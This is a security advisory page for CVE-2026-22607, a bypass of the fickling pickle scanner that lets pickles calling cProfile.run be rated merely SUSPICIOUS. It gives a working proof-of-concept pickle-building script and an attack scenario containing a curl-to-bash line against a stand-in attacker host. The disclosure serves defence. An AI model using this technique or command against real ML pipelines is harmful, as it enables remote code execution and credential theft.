CVE-2026-22607: fickling: Allowlist Bypass evades input filtering

GHSA-p523-jq9w-64x9 HIGH PoC AVAILABLE CISA: ATTEND
Published January 9, 2026
CISO Take

Fickling, the Trail of Bits pickle security scanner widely used as a security gate in ML pipelines, fails to flag `cProfile.run()` as malicious — rating it SUSPICIOUS instead of OVERTLY_MALICIOUS despite enabling full RCE. Any pipeline using fickling ≤ 0.1.6 to vet model files before loading has a false sense of security. Upgrade to fickling 0.1.7 immediately and audit all files previously rated SUSPICIOUS for re-scan.

Risk Assessment

HIGH. Exploitation is trivial — a 10-line Python script generates the malicious pickle with zero prerequisite knowledge. The blast radius is significant because fickling is purpose-built as a security control; bypassing it means the entire ML supply chain security layer is neutralized. Exposure is broad: any team running fickling scans on externally-sourced model files (from HuggingFace, MLflow, shared repos, or CI/CD pipelines) is affected. CVSS is unscored but functionally equivalent to a CVSS 8.8+ given reliable RCE with no special privileges and minimal attack complexity.

Affected Systems

Package Ecosystem Vulnerable Range Patched
fickling pip <= 0.1.6 0.1.7
620 OpenSSF 7.9 57 dependents Pushed 16d ago 100% patched ~5d to patch Full package profile →

Do you use fickling? You're affected.

Severity & Risk

CVSS 3.1
N/A
EPSS
0.1%
chance of exploitation in 30 days
Higher than 20% of all CVEs
Exploitation Status
Exploit Available
Exploitation: MEDIUM
Sophistication
Trivial
Exploitation Confidence
medium
CISA SSVC: Public PoC
Public PoC indexed (trickest/cve)
Composite signal derived from CISA KEV, CISA SSVC, EPSS, trickest/cve, and Nuclei templates.

Recommended Action

6 steps
  1. Patch immediately

    Upgrade fickling to 0.1.7 (pip install --upgrade fickling).

  2. Re-scan suspicious files

    Re-run fickling 0.1.7 against all pickle files previously rated SUSPICIOUS — some may be reclassified as OVERTLY_MALICIOUS.

  3. Defense in depth

    Never rely solely on fickling; layer with sandboxed execution environments (e.g., gVisor, Firecracker) when loading externally-sourced models.

  4. Format migration

    Where possible, migrate from pickle to safer serialization formats (SafeTensors, ONNX, TorchScript) which eliminate deserialization RCE risk entirely.

  5. Detection

    Search codebase and CI logs for fickling calls that act on SUSPICIOUS-rated results without blocking — treat these as security gaps.

  6. Block cProfile in upstream

    If using a custom allowlist/blocklist approach, add cProfile, cProfile.run, cProfile.runctx, and _lsprof to denied imports.

CISA SSVC Assessment

Decision Attend
Exploitation poc
Automatable Yes
Technical Impact total

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

Classification

Compliance Impact

This CVE is relevant to:

EU AI Act
Article 15 - Accuracy, robustness and cybersecurity Article 9 - Risk management system
ISO 42001
A.6.1.4 - AI system security testing and evaluation A.6.2.3 - AI supply chain risk management A.8.2 - AI system security testing and verification A.8.3 - AI supply chain management
NIST AI RMF
GOVERN 1.7 - Processes for identifying and managing AI risks GOVERN 6.1 - Policies and procedures for AI risk and trustworthiness MANAGE 2.2 - Treatments, responses, and controls are selected and applied to address AI risks MANAGE 2.4 - Mechanisms for tracking and addressing identified AI risks
OWASP LLM Top 10
LLM03:2025 - Supply Chain Vulnerabilities LLM05:2025 - Insecure Plugin Design / Supply Chain Vulnerabilities

Frequently Asked Questions

What is CVE-2026-22607?

Fickling, the Trail of Bits pickle security scanner widely used as a security gate in ML pipelines, fails to flag `cProfile.run()` as malicious — rating it SUSPICIOUS instead of OVERTLY_MALICIOUS despite enabling full RCE. Any pipeline using fickling ≤ 0.1.6 to vet model files before loading has a false sense of security. Upgrade to fickling 0.1.7 immediately and audit all files previously rated SUSPICIOUS for re-scan.

Is CVE-2026-22607 actively exploited?

Proof-of-concept exploit code is publicly available for CVE-2026-22607, increasing the risk of exploitation.

How to fix CVE-2026-22607?

1. **Patch immediately**: Upgrade fickling to 0.1.7 (`pip install --upgrade fickling`). 2. **Re-scan suspicious files**: Re-run fickling 0.1.7 against all pickle files previously rated SUSPICIOUS — some may be reclassified as OVERTLY_MALICIOUS. 3. **Defense in depth**: Never rely solely on fickling; layer with sandboxed execution environments (e.g., gVisor, Firecracker) when loading externally-sourced models. 4. **Format migration**: Where possible, migrate from pickle to safer serialization formats (SafeTensors, ONNX, TorchScript) which eliminate deserialization RCE risk entirely. 5. **Detection**: Search codebase and CI logs for fickling calls that act on SUSPICIOUS-rated results without blocking — treat these as security gaps. 6. **Block cProfile in upstream**: If using a custom allowlist/blocklist approach, add `cProfile`, `cProfile.run`, `cProfile.runctx`, and `_lsprof` to denied imports.

What systems are affected by CVE-2026-22607?

This vulnerability affects the following AI/ML architecture patterns: model serving, training pipelines, ML artifact registries and CI/CD pipelines, model validation and security scanning tooling.

What is the CVSS score for CVE-2026-22607?

No CVSS score has been assigned yet.

Technical Details

NVD Description

# Fickling's assessment `cProfile` was added to the list of unsafe imports (https://github.com/trailofbits/fickling/commit/dc8ae12966edee27a78fe05c5745171a2b138d43). # Original report ## Description ### Summary Fickling versions up to and including 0.1.6 do not treat Python's `cProfile` module as unsafe. Because of this, a malicious pickle that uses `cProfile.run()` is classified as SUSPICIOUS instead of OVERTLY_MALICIOUS. If a user relies on Fickling's output to decide whether a pickle is safe to deserialize, this misclassification can lead them to execute attacker-controlled code on their system. This affects any workflow or product that uses Fickling as a security gate for pickle deserialization. ### Details The `cProfile` module is missing from fickling's block list of unsafe module imports in `fickling/analysis.py`. This is the same root cause as CVE-2025-67748 (pty) and CVE-2025-67747 (marshal/types). Incriminated source code: - File: `fickling/analysis.py` - Class: `UnsafeImports` - Issue: The blocklist does not include `cProfile`, `cProfile.run`, or `cProfile.runctx` Reference to similar fix: - PR #187 added `pty` to the blocklist to fix CVE-2025-67748 - PR #108 documented the blocklist approach - The same fix pattern should be applied for `cProfile` How the bypass works: 1. Attacker creates a pickle using `cProfile.run()` in `__reduce__` 2. `cProfile.run()` accepts a Python code string and executes it directly (C-accelerated version of profile.run) 3. Fickling's `UnsafeImports` analysis does not flag `cProfile` as dangerous 4. Only the `UnusedVariables` heuristic triggers, resulting in SUSPICIOUS severity 5. The pickle should be rated OVERTLY_MALICIOUS like `os.system`, `eval`, and `exec` Tested behavior (fickling 0.1.6): | Function | Fickling Severity | RCE Capable | |----------|-------------------|-------------| | os.system | LIKELY_OVERTLY_MALICIOUS | Yes | | eval | OVERTLY_MALICIOUS | Yes | | exec | OVERTLY_MALICIOUS | Yes | | cProfile.run | SUSPICIOUS | Yes ← BYPASS | | cProfile.runctx | SUSPICIOUS | Yes ← BYPASS | Suggested fix: Add to the unsafe imports blocklist in `fickling/analysis.py`: - `cProfile` - `cProfile.run` - `cProfile.runctx` - `_lsprof` (underlying C module) ## PoC Complete instructions, including specific configuration details, to reproduce the vulnerability. Environment: - Python 3.13.2 - fickling 0.1.6 (latest version, installed via pip) ### Step 1: Create malicious pickle ```python import pickle import cProfile class MaliciousPayload: def __reduce__(self): return (cProfile.run, ("print('CPROFILE_RCE_CONFIRMED')",)) with open("malicious.pkl", "wb") as f: pickle.dump(MaliciousPayload(), f) ``` ### Step 2: Analyze with fickling ```python from fickling.fickle import Pickled from fickling.analysis import check_safety with open('malicious.pkl', 'rb') as f: data = f.read() pickled = Pickled.load(data) result = check_safety(pickled) print(f"Severity: {result.severity}") print(f"Analysis: {result}") ``` Expected output (if properly detected): ``` Severity: Severity.OVERTLY_MALICIOUS ``` Actual output (bypass confirmed): ``` Severity: Severity.SUSPICIOUS Analysis: Variable `_var0` is assigned value `run(...)` but unused afterward; this is suspicious and indicative of a malicious pickle file ``` ### Step 3: Prove RCE by loading the pickle ```bash python -c "import pickle; pickle.load(open('malicious.pkl', 'rb'))" ``` Output ``` CPROFILE_RCE_CONFIRMED 4 function calls in 0.000 seconds Ordered by: standard name ncalls tottime percall cumtime percall filename:lineno(function) 1 0.000 0.000 0.000 0.000 <string>:1(<module>) 1 0.000 0.000 0.000 0.000 {built-in method builtins.exec} 1 0.000 0.000 0.000 0.000 {built-in method builtins.print} 1 0.000 0.000 0.000 0.000 {method 'disable' of '_lsprof.Profiler' objects} ``` Check: The code executes, proving RCE. ### Pickle disassembly (evidence): ``` 0: \x80 PROTO 5 2: \x95 FRAME 58 11: \x8c SHORT_BINUNICODE 'cProfile' 21: \x94 MEMOIZE (as 0) 22: \x8c SHORT_BINUNICODE 'run' 27: \x94 MEMOIZE (as 1) 28: \x93 STACK_GLOBAL 29: \x94 MEMOIZE (as 2) 30: \x8c SHORT_BINUNICODE "print('CPROFILE_RCE_CONFIRMED')" 63: \x94 MEMOIZE (as 3) 64: \x85 TUPLE1 65: \x94 MEMOIZE (as 4) 66: R REDUCE 67: \x94 MEMOIZE (as 5) 68: . STOP highest protocol among opcodes = 4 ``` ## Impact Vulnerability Type: Incomplete blocklist leading to safety check bypass (CWE-184) and arbitrary code execution via insecure deserialization (CWE-502). Who is impacted: Any user or system that relies on fickling to vet pickle files for security issues before loading them. This includes: - ML model validation pipelines - Model hosting platforms (Hugging Face, MLflow, etc.) - Security scanning tools that use fickling - CI/CD pipelines that validate pickle artifacts Attack scenario: An attacker uploads a malicious ML model or pickle file to a model repository. The victim's pipeline uses fickling to scan uploads. Fickling rates the file as "SUSPICIOUS" (not "OVERTLY_MALICIOUS"), so the file is not rejected. When the victim loads the model, arbitrary code executes on their system. Why cProfile.run() is dangerous: Unlike `runpy.run_path()` which requires a file on disk, `cProfile.run()` takes a code string directly. This means the entire attack is self-contained in the pickle - no external files needed. Python docs explicitly state that `cProfile.run()` takes "a single argument that can be passed to the exec() function". `cProfile` is the C-accelerated version and is more commonly available than `profile`. It's also the recommended profiler per Python docs ("cProfile is recommended for most users"), so it's present in virtually all Python installations. Severity: HIGH - The attacker achieves arbitrary code execution - The security control (fickling) is specifically designed to prevent this - The bypass requires no special conditions beyond crafting the pickle with cProfile - Attack is fully self-contained (no external files needed) - cProfile is more commonly used than profile, increasing attack surface

Exploitation Scenario

An adversary targets an organization that accepts community-contributed ML models (e.g., a fine-tuned LLM or classifier). They craft a malicious `.pkl` file embedding `cProfile.run('import os; os.system("curl attacker.com/shell.sh | bash")')` in a `__reduce__` method. The file is submitted to the target's model registry or shared via a GitHub pull request. The victim's CI/CD pipeline runs `fickling check_safety()` — fickling 0.1.6 returns SUSPICIOUS, which the pipeline treats as a non-blocking warning (not OVERTLY_MALICIOUS). The model is approved and loaded by a downstream job. The cProfile call executes the embedded code string, establishing a reverse shell or exfiltrating credentials. The attack requires no external files, no victim interaction beyond normal model loading, and leaves minimal forensic trace since cProfile is a legitimate Python stdlib module.

Timeline

Published
January 9, 2026
Last Modified
January 11, 2026
First Seen
March 24, 2026

Related Vulnerabilities